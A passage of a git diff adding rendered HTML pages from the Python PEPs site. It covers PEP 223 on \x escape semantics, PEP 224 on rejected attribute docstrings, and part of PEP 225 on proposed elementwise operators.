+        "http://foo.com/bar".  Does not include the query string (if
+        any)
+        """
+
+    def getBaseURL(self, n=0):
+        """Return the base URL of the current request, adding 'n' path
+        components to the end to recreate more of the whole URL.
+
+        Eg. if the request URL is
+        "http://foo.com/q/bar/baz/qux", n=0 would return
+        "http://foo.com/", and n=2 "http://foo.com/q/bar".
+
+        Returned URL does not include the query string, if any.
+        """
+
+    def dump(self):
+        "String representation suitable for debugging output"
+        pass
+
+    # Possibilities?  I don't know if these are worth doing in the
+    # basic objects.
+    def getBrowser(self):
+        "Returns Mozilla/IE/Lynx/Opera/whatever"
+
+    def isSecure(self):
+        "Return true if this is an SSLified request"
+
+
+# Module-level function
+def wrapper(func, logfile=sys.stderr):
+    """
+    Calls the function 'func', passing it the arguments
+    (request, response, logfile).  Exceptions are trapped and
+    sent to the file 'logfile'.
+    """
+    # This wrapper will detect if it's being called from the command-line,
+    # and if so, it will run in a debugging mode; name=value pairs
+    # can be entered on standard input to set field values.
+    # (XXX how to do file uploads in this syntax?)
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0222.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0223/index.html b/pep-0223/index.html new file mode 100644 index 00000000000..f347a90d78b --- /dev/null +++ b/pep-0223/index.html @@ -0,0 +1,331 @@ + + + + + + + + PEP 223 – Change the Meaning of \x Escapes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 223 – Change the Meaning of \x Escapes

+
+
Author:
+
Tim Peters <tim.peters at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Aug-2000
+
Python-Version:
+
2.0
+
Post-History:
+
23-Aug-2000
+
+
+
+
Table of Contents +
+
+

Abstract

+

Change \x escapes, in both 8-bit and Unicode strings, to consume +exactly the two hex digits following. The proposal views this as +correcting an original design flaw, leading to clearer expression +in all flavors of string, a cleaner Unicode story, better +compatibility with Perl regular expressions, and with minimal risk +to existing code.

+
+
+

Syntax

+

The syntax of \x escapes, in all flavors of non-raw strings, becomes

+
\xhh
+
+
+

where h is a hex digit (0-9, a-f, A-F). The exact syntax in 1.5.2 is +not clearly specified in the Reference Manual; it says

+
\xhh...
+
+
+

implying “two or more” hex digits, but one-digit forms are also +accepted by the 1.5.2 compiler, and a plain \x is “expanded” to +itself (i.e., a backslash followed by the letter x). It’s unclear +whether the Reference Manual intended either of the 1-digit or +0-digit behaviors.

+
+
+

Semantics

+

In an 8-bit non-raw string,

+
\xij
+
+
+

expands to the character

+
chr(int(ij, 16))
+
+
+

Note that this is the same as in 1.6 and before.

+

In a Unicode string,

+
\xij
+
+
+

acts the same as

+
\u00ij
+
+
+

i.e. it expands to the obvious Latin-1 character from the initial +segment of the Unicode space.

+

An \x not followed by at least two hex digits is a compile-time error, +specifically ValueError in 8-bit strings, and UnicodeError (a subclass +of ValueError) in Unicode strings. Note that if an \x is followed by +more than two hex digits, only the first two are “consumed”. In 1.6 +and before all but the last two were silently ignored.

+
+
+

Example

+

In 1.5.2:

+
>>> "\x123465"  # same as "\x65"
+'e'
+>>> "\x65"
+'e'
+>>> "\x1"
+'\001'
+>>> "\x\x"
+'\\x\\x'
+>>>
+
+
+

In 2.0:

+
>>> "\x123465" # \x12 -> \022, "3456" left alone
+'\0223456'
+>>> "\x65"
+'e'
+>>> "\x1"
+[ValueError is raised]
+>>> "\x\x"
+[ValueError is raised]
+>>>
+
+
+
+
+

History and Rationale

+

\x escapes were introduced in C as a way to specify variable-width +character encodings. Exactly which encodings those were, and how many +hex digits they required, was left up to each implementation. The +language simply stated that \x “consumed” all hex digits following, +and left the meaning up to each implementation. So, in effect, \x in C +is a standard hook to supply platform-defined behavior.

+

Because Python explicitly aims at platform independence, the \x escape +in Python (up to and including 1.6) has been treated the same way +across all platforms: all except the last two hex digits were +silently ignored. So the only actual use for \x escapes in Python was +to specify a single byte using hex notation.

+

Larry Wall appears to have realized that this was the only real use for +\x escapes in a platform-independent language, as the proposed rule for +Python 2.0 is in fact what Perl has done from the start (although you +need to run in Perl -w mode to get warned about \x escapes with fewer +than 2 hex digits following – it’s clearly more Pythonic to insist on +2 all the time).

+

When Unicode strings were introduced to Python, \x was generalized so +as to ignore all but the last four hex digits in Unicode strings. +This caused a technical difficulty for the new regular expression engine: +SRE tries very hard to allow mixing 8-bit and Unicode patterns and +strings in intuitive ways, and it no longer had any way to guess what, +for example, r"\x123456" should mean as a pattern: is it asking to match +the 8-bit character \x56 or the Unicode character \u3456?

+

There are hacky ways to guess, but it doesn’t end there. The ISO C99 +standard also introduces 8-digit \U12345678 escapes to cover the entire +ISO 10646 character space, and it’s also desired that Python 2 support +that from the start. But then what are \x escapes supposed to mean? +Do they ignore all but the last eight hex digits then? And if less +than 8 following in a Unicode string, all but the last 4? And if less +than 4, all but the last 2?

+

This was getting messier by the minute, and the proposal cuts the +Gordian knot by making \x simpler instead of more complicated. Note +that the 4-digit generalization to \xijkl in Unicode strings was also +redundant, because it meant exactly the same thing as \uijkl in Unicode +strings. It’s more Pythonic to have just one obvious way to specify a +Unicode character via hex notation.

+
+
+

Development and Discussion

+

The proposal was worked out among Guido van Rossum, Fredrik Lundh and +Tim Peters in email. It was subsequently explained and discussed on +Python-Dev under subject “Go x yourself” [1], starting 2000-08-03. +Response was overwhelmingly positive; no objections were raised.

+
+
+

Backward Compatibility

+

Changing the meaning of \x escapes does carry risk of breaking existing +code, although no instances of incompatibility have yet been discovered. +The risk is believed to be minimal.

+

Tim Peters verified that, except for pieces of the standard test suite +deliberately provoking end cases, there are no instances of \xabcdef... +with fewer or more than 2 hex digits following, in either the Python +CVS development tree, or in assorted Python packages sitting on his +machine.

+

It’s unlikely there are any with fewer than 2, because the Reference +Manual implied they weren’t legal (although this is debatable!). If +there are any with more than 2, Guido is ready to argue they were buggy +anyway <0.9 wink>.

+

Guido reported that the O’Reilly Python books already document that +Python works the proposed way, likely due to their Perl editing +heritage (as above, Perl worked (very close to) the proposed way from +its start).

+

Finn Bock reported that what JPython does with \x escapes is +unpredictable today. This proposal gives a clear meaning that can be +consistently and easily implemented across all Python implementations.

+
+
+

Effects on Other Tools

+

Believed to be none. The candidates for breakage would mostly be +parsing tools, but the author knows of none that worry about the +internal structure of Python strings beyond the approximation “when +there’s a backslash, swallow the next character”. Tim Peters checked +python-mode.el, the std tokenize.py and pyclbr.py, and the IDLE syntax +coloring subsystem, and believes there’s no need to change any of +them. Tools like tabnanny.py and checkappend.py inherit their immunity +from tokenize.py.

+
+
+

Reference Implementation

+

The code changes are so simple that a separate patch will not be produced. +Fredrik Lundh is writing the code, is an expert in the area, and will +simply check the changes in before 2.0b1 is released.

+
+
+

BDFL Pronouncements

+

Yes, ValueError, not SyntaxError. “Problems with literal interpretations +traditionally raise ‘runtime’ exceptions rather than syntax errors.”

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0223.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0224/index.html b/pep-0224/index.html new file mode 100644 index 00000000000..d3317119840 --- /dev/null +++ b/pep-0224/index.html @@ -0,0 +1,364 @@ + + + + + + + + PEP 224 – Attribute Docstrings | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 224 – Attribute Docstrings

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
23-Aug-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Warning

+

This PEP has been rejected.

+

×

+

See Comments from our BDFL for more information.

+

+
+
+

Introduction

+

This PEP describes the “attribute docstring” proposal for Python +2.0. This PEP tracks the status and ownership of this feature. +It contains a description of the feature and outlines changes +necessary to support the feature. The CVS revision history of +this file contains the definitive historical record.

+
+
+

Rationale

+

This PEP proposes a small addition to the way Python currently +handles docstrings embedded in Python code.

+

Python currently only handles the case of docstrings which appear +directly after a class definition, a function definition or as +first string literal in a module. The string literals are added +to the objects in question under the __doc__ attribute and are +from then on available for introspection tools which can extract +the contained information for help, debugging and documentation +purposes.

+

Docstrings appearing in locations other than the ones mentioned +are simply ignored and don’t result in any code generation.

+

Here is an example:

+
class C:
+    "class C doc-string"
+
+    a = 1
+    "attribute C.a doc-string (1)"
+
+    b = 2
+    "attribute C.b doc-string (2)"
+
+
+

The docstrings (1) and (2) are currently being ignored by the +Python byte code compiler, but could obviously be put to good use +for documenting the named assignments that precede them.

+

This PEP proposes to also make use of these cases by proposing +semantics for adding their content to the objects in which they +appear under new generated attribute names.

+

The original idea behind this approach which also inspired the +above example was to enable inline documentation of class +attributes, which can currently only be documented in the class’s +docstring or using comments which are not available for +introspection.

+
+
+

Implementation

+

Docstrings are handled by the byte code compiler as expressions. +The current implementation special cases the few locations +mentioned above to make use of these expressions, but otherwise +ignores the strings completely.

+

To enable use of these docstrings for documenting named +assignments (which is the natural way of defining e.g. class +attributes), the compiler will have to keep track of the last +assigned name and then use this name to assign the content of the +docstring to an attribute of the containing object by means of +storing it in as a constant which is then added to the object’s +namespace during object construction time.

+

In order to preserve features like inheritance and hiding of +Python’s special attributes (ones with leading and trailing double +underscores), a special name mangling has to be applied which +uniquely identifies the docstring as belonging to the name +assignment and allows finding the docstring later on by inspecting +the namespace.

+

The following name mangling scheme achieves all of the above:

+
__doc_<attributename>__
+
+
+

To keep track of the last assigned name, the byte code compiler +stores this name in a variable of the compiling structure. This +variable defaults to NULL. When it sees a docstring, it then +checks the variable and uses the name as basis for the above name +mangling to produce an implicit assignment of the docstring to the +mangled name. It then resets the variable to NULL to avoid +duplicate assignments.

+

If the variable does not point to a name (i.e. is NULL), no +assignments are made. These will continue to be ignored like +before. All classical docstrings fall under this case, so no +duplicate assignments are done.

+

In the above example this would result in the following new class +attributes to be created:

+
C.__doc_a__ == "attribute C.a doc-string (1)"
+C.__doc_b__ == "attribute C.b doc-string (2)"
+
+
+

A patch to the current CVS version of Python 2.0 which implements +the above is available on SourceForge at [1].

+
+
+

Caveats of the Implementation

+

Since the implementation does not reset the compiling structure +variable when processing a non-expression, e.g. a function +definition, the last assigned name remains active until either the +next assignment or the next occurrence of a docstring.

+

This can lead to cases where the docstring and assignment may be +separated by other expressions:

+
class C:
+    "C doc string"
+
+    b = 2
+
+    def x(self):
+        "C.x doc string"
+         y = 3
+         return 1
+
+    "b's doc string"
+
+
+

Since the definition of method “x” currently does not reset the +used assignment name variable, it is still valid when the compiler +reaches the docstring “b’s doc string” and thus assigns the string +to __doc_b__.

+

A possible solution to this problem would be resetting the name +variable for all non-expression nodes in the compiler.

+
+
+

Possible Problems

+

Even though highly unlikely, attribute docstrings could get +accidentally concatenated to the attribute’s value:

+
class C:
+    x = "text" \
+        "x's docstring"
+
+
+

The trailing slash would cause the Python compiler to concatenate +the attribute value and the docstring.

+

A modern syntax highlighting editor would easily make this +accident visible, though, and by simply inserting empty lines +between the attribute definition and the docstring you can avoid +the possible concatenation completely, so the problem is +negligible.

+

Another possible problem is that of using triple quoted strings as +a way to uncomment parts of your code.

+

If there happens to be an assignment just before the start of the +comment string, then the compiler will treat the comment as +docstring attribute and apply the above logic to it.

+

Besides generating a docstring for an otherwise undocumented +attribute there is no breakage.

+
+
+

Comments from our BDFL

+

Early comments on the PEP from Guido:

+
+
I “kinda” like the idea of having attribute docstrings (meaning +it’s not of great importance to me) but there are two things I +don’t like in your current proposal:
    +
  1. The syntax you propose is too ambiguous: as you say, +stand-alone string literal are used for other purposes and could +suddenly become attribute docstrings.
  2. +
  3. I don’t like the access method either (__doc_<attrname>__).
  4. +
+
+

The author’s reply:

+
+
> 1. The syntax you propose is too ambiguous: as you say, stand-alone
+>    string literal are used for other purposes and could suddenly
+>    become attribute docstrings.
+
+
+

This can be fixed by introducing some extra checks in the +compiler to reset the “doc attribute” flag in the compiler +struct.

+
> 2. I don't like the access method either (``__doc_<attrname>__``).
+
+
+

Any other name will do. It will only have to match these +criteria:

+
    +
  • must start with two underscores (to match __doc__)
  • +
  • must be extractable using some form of inspection (e.g. by using +a naming convention which includes some fixed name part)
  • +
  • must be compatible with class inheritance (i.e. should be +stored as attribute)
  • +
+
+

Later on in March, Guido pronounced on this PEP in March 2001 (on +python-dev). Here are his reasons for rejection mentioned in +private mail to the author of this PEP:

+
+

It might be useful, but I really hate the proposed syntax.

+
a = 1
+"foo bar"
+b = 1
+
+
+

I really have no way to know whether “foo bar” is a docstring +for a or for b.

+

+

You can use this convention:

+
a = 1
+__doc_a__ = "doc string for a"
+
+
+

This makes it available at runtime.

+
> Are you completely opposed to adding attribute documentation
+> to Python or is it just the way the implementation works ? I
+> find the syntax proposed in the PEP very intuitive and many
+> other users on c.l.p and in private emails have supported it
+> at the time I wrote the PEP.
+
+
+

It’s not the implementation, it’s the syntax. It doesn’t +convey a clear enough coupling between the variable and the +doc string.

+
+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0224.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0225/index.html b/pep-0225/index.html new file mode 100644 index 00000000000..fd8d70ba17c --- /dev/null +++ b/pep-0225/index.html @@ -0,0 +1,847 @@ + + + + + + + + PEP 225 – Elementwise/Objectwise Operators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 225 – Elementwise/Objectwise Operators

+
+
Author:
+
Huaiyu Zhu <hzhu at users.sourceforge.net>, +Gregory Lielens <gregory.lielens at fft.be>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
19-Sep-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Warning

+

This PEP has been rejected.

+

×

+

The approach in the later PEP 465 was eventually accepted +in lieu of this PEP. The Rejected Ideas +of that PEP explains the rationale in more detail.

+

+
+
+

Introduction

+

This PEP describes a proposal to add new operators to Python which are useful +for distinguishing elementwise and objectwise operations, and summarizes +discussions in the news group comp.lang.python on this topic. See Credits and +Archives section at end. Issues discussed here include:

+
    +
  • Background.
  • +
  • Description of proposed operators and implementation issues.
  • +
  • Analysis of alternatives to new operators.
  • +
  • Analysis of alternative forms.
  • +
  • Compatibility issues
  • +
  • Description of wider extensions and other related ideas.
  • +
+

A substantial portion of this PEP describes ideas that do not go into the +proposed extension. They are presented because the extension is essentially +syntactic sugar, so its adoption must be weighed against various possible +alternatives. While many alternatives may be better in some aspects, the +current proposal appears to be overall advantageous.

+

The issues concerning elementwise-objectwise operations extends to wider areas +than numerical computation. This document also describes how the current +proposal may be integrated with more general future extensions.

+
+
+

Background

+

Python provides six binary infix math operators: + - * / % +** hereafter generically represented by op. They can be overloaded +with new semantics for user-defined classes. However, for objects composed of +homogeneous elements, such as arrays, vectors and matrices in numerical +computation, there are two essentially distinct flavors of semantics. The +objectwise operations treat these objects as points in multidimensional spaces. +The elementwise operations treat them as collections of individual elements. +These two flavors of operations are often intermixed in the same formulas, +thereby requiring syntactical distinction.

+

Many numerical computation languages provide two sets of math operators. For +example, in MatLab, the ordinary op is used for objectwise operation while +.op is used for elementwise operation. In R, op stands for elementwise +operation while %op% stands for objectwise operation.

+

In Python, there are other methods of representation, some of which already +used by available numerical packages, such as:

+
    +
  • function: mul(a,b)
  • +
  • method: a.mul(b)
  • +
  • casting: a.E*b
  • +
+

In several aspects these are not as adequate as infix operators. More details +will be shown later, but the key points are:

+
    +
  • Readability: Even for moderately complicated formulas, infix operators are +much cleaner than alternatives.
  • +
  • Familiarity: Users are familiar with ordinary math operators.
  • +
  • Implementation: New infix operators will not unduly clutter Python syntax. +They will greatly ease the implementation of numerical packages.
  • +
+

While it is possible to assign current math operators to one flavor of +semantics, there is simply not enough infix operators to overload for the other +flavor. It is also impossible to maintain visual symmetry between these two +flavors if one of them does not contain symbols for ordinary math operators.

+
+
+

Proposed extension

+
    +
  • Six new binary infix operators ~+ ~- ~* ~/ ~% ~** are +added to core Python. They parallel the existing operators + - * +/ % **.
  • +
  • Six augmented assignment operators ~+= ~-= ~*= ~/= ~%= +~**= are added to core Python. They parallel the operators += -= +*= /= %= **= available in Python 2.0.
  • +
  • Operator ~op retains the syntactical properties of operator op, +including precedence.
  • +
  • Operator ~op retains the semantical properties of operator op on +built-in number types.
  • +
  • Operator ~op raise syntax error on non-number builtin types. This is +temporary until the proper behavior can be agreed upon.
  • +
  • These operators are overloadable in classes with names that prepend t (for +tilde) to names of ordinary math operators. For example, __tadd__ and +__rtadd__ work for ~+ just as __add__ and __radd__ work for ++.
  • +
  • As with existing operators, the __r*__() methods are invoked when the +left operand does not provide the appropriate method.
  • +
+

It is intended that one set of op or ~op is used for elementwise +operations, the other for objectwise operations, but it is not specified which +version of operators stands for elementwise or objectwise operations, leaving +the decision to applications.

+

The proposed implementation is to patch several files relating to the +tokenizer, parser, grammar and compiler to duplicate the functionality of +corresponding existing operators as necessary. All new semantics are to be +implemented in the classes that overload them.

+

The symbol ~ is already used in Python as the unary bitwise not operator. +Currently it is not allowed for binary operators. The new operators are +completely backward compatible.

+
+
+

Prototype Implementation

+

Greg Lielens implemented the infix ~op as a patch against Python 2.0b1 +source [1].

+

To allow ~ to be part of binary operators, the tokenizer would treat ~+ +as one token. This means that currently valid expression ~+1 would be +tokenized as ~+ 1 instead of ~ + 1. The parser would then treat ~+ +as composite of ~ +. The effect is invisible to applications.

+

Notes about current patch:

+
    +
  • It does not include ~op= operators yet.
  • +
  • The ~op behaves the same as op on lists, instead of raising +exceptions.
  • +
+

These should be fixed when the final version of this proposal is ready.

+
    +
  • It reserves xor as an infix operator with the semantics equivalent to:
    def __xor__(a, b):
    +    if not b: return a
    +    elif not a: return b
    +    else: 0
    +
    +
    +
  • +
+

This preserves true value as much as possible, otherwise preserve left hand +side value if possible.

+

This is done so that bitwise operators could be regarded as elementwise +logical operators in the future (see below).

+
+
+

Alternatives to adding new operators

+

The discussions on comp.lang.python and python-dev mailing list explored many +alternatives. Some of the leading alternatives are listed here, using the +multiplication operator as an example.

+
    +
  1. Use function mul(a,b).

    Advantage:

    +
      +
    • No need for new operators.
    • +
    +

    Disadvantage:

    +
      +
    • Prefix forms are cumbersome for composite formulas.
    • +
    • Unfamiliar to the intended users.
    • +
    • Too verbose for the intended users.
    • +
    • Unable to use natural precedence rules.
    • +
    +
  2. +
  3. Use method call a.mul(b).

    Advantage:

    +
      +
    • No need for new operators.
    • +
    +

    Disadvantage:

    +
      +
    • Asymmetric for both operands.
    • +
    • Unfamiliar to the intended users.
    • +
    • Too verbose for the intended users.
    • +
    • Unable to use natural precedence rules.
    • +
    +
  4. +
  5. Use shadow classes. For matrix class define a shadow array class +accessible through a method .E, so that for matrices a and b, +a.E*b would be a matrix object that is elementwise_mul(a,b).

    Likewise define a shadow matrix class for arrays accessible through a method +.M so that for arrays a and b, a.M*b would be an array that is +matrixwise_mul(a,b).

    +

    Advantage:

    +
      +
    • No need for new operators.
    • +
    • Benefits of infix operators with correct precedence rules.
    • +
    • Clean formulas in applications.
    • +
    +

    Disadvantage:

    +
      +
    • Hard to maintain in current Python because ordinary numbers cannot have +user defined class methods; i.e. a.E*b will fail if a is a pure +number.
    • +
    • Difficult to implement, as this will interfere with existing method calls, +like .T for transpose, etc.
    • +
    • Runtime overhead of object creation and method lookup.
    • +
    • The shadowing class cannot replace a true class, because it does not +return its own type. So there need to be a M class with shadow E +class, and an E class with shadow M class.
    • +
    • Unnatural to mathematicians.
    • +
    +
  6. +
  7. Implement matrixwise and elementwise classes with easy casting to the other +class. So matrixwise operations for arrays would be like a.M*b.M and +elementwise operations for matrices would be like a.E*b.E. For error +detection a.E*b.M would raise exceptions.

    Advantage:

    +
      +
    • No need for new operators.
    • +
    • Similar to infix notation with correct precedence rules.
    • +
    +

    Disadvantage:

    +
      +
    • Similar difficulty due to lack of user-methods for pure numbers.
    • +
    • Runtime overhead of object creation and method lookup.
    • +
    • More cluttered formulas.
    • +
    • Switching of flavor of objects to facilitate operators becomes persistent. +This introduces long range context dependencies in application code that +would be extremely hard to maintain.
    • +
    +
  8. +
  9. Using mini parser to parse formulas written in arbitrary extension placed in +quoted strings.

    Advantage:

    +
      +
    • Pure Python, without new operators
    • +
    +

    Disadvantage:

    +
      +
    • The actual syntax is within the quoted string, which does not resolve the +problem itself.
    • +
    • Introducing zones of special syntax.
    • +
    • Demanding on the mini-parser.
    • +
    +
  10. +
  11. Introducing a single operator, such as @, for matrix multiplication.

    Advantage:

    +
      +
    • Introduces less operators
    • +
    +

    Disadvantage:

    +
      +
    • The distinctions for operators like + - ** are equally +important. Their meaning in matrix or array-oriented packages would be +reversed (see below).
    • +
    • The new operator occupies a special character.
    • +
    • This does not work well with more general object-element issues.
    • +
    +
  12. +
+

Among these alternatives, the first and second are used in current applications +to some extent, but found inadequate. The third is the most favorite for +applications, but it will incur huge implementation complexity. The fourth +would make applications codes very context-sensitive and hard to maintain. +These two alternatives also share significant implementational difficulties due +to current type/class split. The fifth appears to create more problems than it +would solve. The sixth does not cover the same range of applications.

+
+
+

Alternative forms of infix operators

+

Two major forms and several minor variants of new infix operators were +discussed:

+
    +
  • Bracketed form:
    (op)
    +[op]
    +{op}
    +<op>
    +:op:
    +~op~
    +%op%
    +
    +
    +
  • +
  • Meta character form:
    .op
    +@op
    +~op
    +
    +
    +

    Alternatively the meta character is put after the operator.

    +
  • +
  • Less consistent variations of these themes. These are considered +unfavorably. For completeness some are listed here:
      +
    • Use @/ and /@ for left and right division
    • +
    • Use [*] and (*) for outer and inner products
    • +
    • Use a single operator @ for multiplication.
    • +
    +
  • +
  • Use __call__ to simulate multiplication:
    a(b) or (a)(b)
    +
    +
    +
  • +
+

Criteria for choosing among the representations include:

+
    +
  • No syntactical ambiguities with existing operators.
  • +
  • Higher readability in actual formulas. This makes the bracketed forms +unfavorable. See examples below.
  • +
  • Visually similar to existing math operators.
  • +
  • Syntactically simple, without blocking possible future extensions.
  • +
+

With these criteria the overall winner in bracket form appear to be {op}. +A clear winner in the meta character form is ~op. Comparing these it +appears that ~op is the favorite among them all.

+

Some analysis are as follows:

+
    +
  • The .op form is ambiguous: 1.+a would be different from 1 .+a.
  • +
  • The bracket type operators are most favorable when standing alone, but +not in formulas, as they interfere with visual parsing of parentheses for +precedence and function argument. This is so for (op) and [op], and +somewhat less so for {op} and <op>.
  • +
  • The <op> form has the potential to be confused with < > and =.
  • +
  • The @op is not favored because @ is visually heavy (dense, more like +a letter): a@+b is more readily read as a@ + b than a @+ b.
  • +
  • For choosing meta-characters: Most of existing ASCII symbols have already +been used. The only three unused are @ $ ?.
  • +
+
+
+

Semantics of new operators

+

There are convincing arguments for using either set of operators as objectwise +or elementwise. Some of them are listed here:

+
    +
  1. op for element, ~op for object
      +
    • Consistent with current multiarray interface of Numeric package.
    • +
    • Consistent with some other languages.
    • +
    • Perception that elementwise operations are more natural.
    • +
    • Perception that elementwise operations are used more frequently
    • +
    +
  2. +
  3. op for object, ~op for element
      +
    • Consistent with current linear algebra interface of MatPy package.
    • +
    • Consistent with some other languages.
    • +
    • Perception that objectwise operations are more natural.
    • +
    • Perception that objectwise operations are used more frequently.
    • +
    • Consistent with the current behavior of operators on lists.
    • +
    • Allow ~ to be a general elementwise meta-character in future +extensions.
    • +
    +
  4. +
+

It is generally agreed upon that

+
    +
  • There is no absolute reason to favor one or the other.
  • +
  • It is easy to cast from one representation to another in a sizable chunk of +code, so the other flavor of operators is always minority.
  • +
  • There are other semantic differences that favor existence of array-oriented +and matrix-oriented packages, even if their operators are unified.
  • +
  • Whatever the decision is taken, codes using existing interfaces should not be +broken for a very long time.
  • +
+

Therefore, not much is lost, and much flexibility retained, if the semantic +flavors of these two sets of operators are not dictated by the core language. +The application packages are responsible for making the most suitable choice. +This is already the case for NumPy and MatPy which use opposite semantics. +Adding new operators will not break this. See also observation after +subsection 2 in the Examples below.

+

The issue of numerical precision was raised, but if the semantics is left to +the applications, the actual precisions should also go there.

+
+
+

Examples

+

Following are examples of the actual formulas that will appear using various +operators or other representations described above.

+
    +
  1. The matrix inversion formula:
      +
    • Using op for object and ~op for element:
      b = a.I - a.I * u / (c.I + v/a*u) * v / a
      +
      +b = a.I - a.I * u * (c.I + v*a.I*u).I * v * a.I
      +
      +
      +
    • +
    • Using op for element and ~op for object:
      b = a.I @- a.I @* u @/ (c.I @+ v@/a@*u) @* v @/ a
      +
      +b = a.I ~- a.I ~* u ~/ (c.I ~+ v~/a~*u) ~* v ~/ a
      +
      +b = a.I (-) a.I (*) u (/) (c.I (+) v(/)a(*)u) (*) v (/) a
      +
      +b = a.I [-] a.I [*] u [/] (c.I [+] v[/]a[*]u) [*] v [/] a
      +
      +b = a.I <-> a.I <*> u </> (c.I <+> v</>a<*>u) <*> v </> a
      +
      +b = a.I {-} a.I {*} u {/} (c.I {+} v{/}a{*}u) {*} v {/} a
      +
      +
      +
    • +
    +

    Observation: For linear algebra using op for object is preferable.

    +

    Observation: The ~op type operators look better than (op) type in +complicated formulas.

    +
      +
    • using named operators:
      b = a.I @sub a.I @mul u @div (c.I @add v @div a @mul u) @mul v @div a
      +
      +b = a.I ~sub a.I ~mul u ~div (c.I ~add v ~div a ~mul u) ~mul v ~div a
      +
      +
      +
    • +
    +

    Observation: Named operators are not suitable for math formulas.

    +
  2. +
  3. Plotting a 3d graph
      +
    • Using op for object and ~op for element:
      z = sin(x~**2 ~+ y~**2);    plot(x,y,z)
      +
      +
      +
    • +
    • Using op for element and ~op for object:
      z = sin(x**2 + y**2);   plot(x,y,z)
      +
      +
      +
    • +
    +

    Observation: Elementwise operations with broadcasting allows much more +efficient implementation than MatLab.

    +

    Observation: It is useful to have two related classes with the semantics of +op and ~op swapped. Using these the ~op operators would only +need to appear in chunks of code where the other flavor dominates, while +maintaining consistent semantics of the code.

    +
  4. +
  5. Using + and - with automatic broadcasting:
    a = b - c;  d = a.T*a
    +
    +
    +

    Observation: This would silently produce hard-to-trace bugs if one of b or +c is row vector while the other is column vector.

    +
  6. +
+
+
+

Miscellaneous issues

+
    +
  • Need for the ~+ ~- operators. The objectwise + - are +important because they provide important sanity checks as per linear algebra. +The elementwise + - are important because they allow broadcasting +that are very efficient in applications.
  • +
  • Left division (solve). For matrix, a*x is not necessarily equal to +x*a. The solution of a*x==b, denoted x=solve(a,b), is therefore +different from the solution of x*a==b, denoted x=div(b,a). There are +discussions about finding a new symbol for solve. [Background: MatLab use +b/a for div(b,a) and a\b for solve(a,b).]

    It is recognized that Python provides a better solution without requiring a +new symbol: the inverse method .I can be made to be delayed so that +a.I*b and b*a.I are equivalent to Matlab’s a\b and b/a. The +implementation is quite simple and the resulting application code clean.

    +
  • +
  • Power operator. Python’s use of a**b as pow(a,b) has two perceived +disadvantages:
      +
    • Most mathematicians are more familiar with a^b for this purpose.
    • +
    • It results in long augmented assignment operator ~**=.
    • +
    +

    However, this issue is distinct from the main issue here.

    +
  • +
  • Additional multiplication operators. Several forms of multiplications are +used in (multi-)linear algebra. Most can be seen as variations of +multiplication in linear algebra sense (such as Kronecker product). But two +forms appear to be more fundamental: outer product and inner product. +However, their specification includes indices, which can be either
      +
    • associated with the operator, or
    • +
    • associated with the objects.
    • +
    +

    The latter (the Einstein notation) is used extensively on paper, and is also +the easier one to implement. By implementing a tensor-with-indices class, a +general form of multiplication would cover both outer and inner products, and +specialize to linear algebra multiplication as well. The index rule can be +defined as class methods, like:

    +
    a = b.i(1,2,-1,-2) * c.i(4,-2,3,-1)   # a_ijkl = b_ijmn c_lnkm
    +
    +
    +

    Therefore, one objectwise multiplication is sufficient.

    +
  • +
  • Bitwise operators.
      +
    • The proposed new math operators use the symbol ~ that is bitwise not +operator. This poses no compatibility problem but somewhat complicates +implementation.
    • +
    • The symbol ^ might be better used for pow than bitwise xor. But +this depends on the future of bitwise operators. It does not immediately +impact on the proposed math operator.
    • +
    • The symbol | was suggested to be used for matrix solve. But the new +solution of using delayed .I is better in several ways.
    • +
    • The current proposal fits in a larger and more general extension that will +remove the need for special bitwise operators. (See elementization below.)
    • +
    +
  • +
  • Alternative to special operator names used in definition,
    def "+"(a, b)      in place of       def __add__(a, b)
    +
    +
    +

    This appears to require greater syntactical change, and would only be useful +when arbitrary additional operators are allowed.

    +
  • +
+
+
+

Impact on general elementization

+

The distinction between objectwise and elementwise operations are meaningful in +other contexts as well, where an object can be conceptually regarded as a +collection of elements. It is important that the current proposal does not +preclude possible future extensions.

+

One general future extension is to use ~ as a meta operator to elementize +a given operator. Several examples are listed here:

+
    +
  1. Bitwise operators. Currently Python assigns six operators to bitwise +operations: and (&), or (|), xor (^), complement (~), left +shift (<<) and right shift (>>), with their own precedence levels.

    Among them, the & | ^ ~ operators can be regarded as +elementwise versions of lattice operators applied to integers regarded as +bit strings.:

    +
    5 and 6                # 6
    +5 or 6                 # 5
    +
    +5 ~and 6               # 4
    +5 ~or 6                # 7
    +
    +
    +

    These can be regarded as general elementwise lattice operators, not +restricted to bits in integers.

    +

    In order to have named operators for xor ~xor, it is necessary to +make xor a reserved word.

    +
  2. +
  3. List arithmetics.:
    [1, 2] + [3, 4]        # [1, 2, 3, 4]
    +[1, 2] ~+ [3, 4]       # [4, 6]
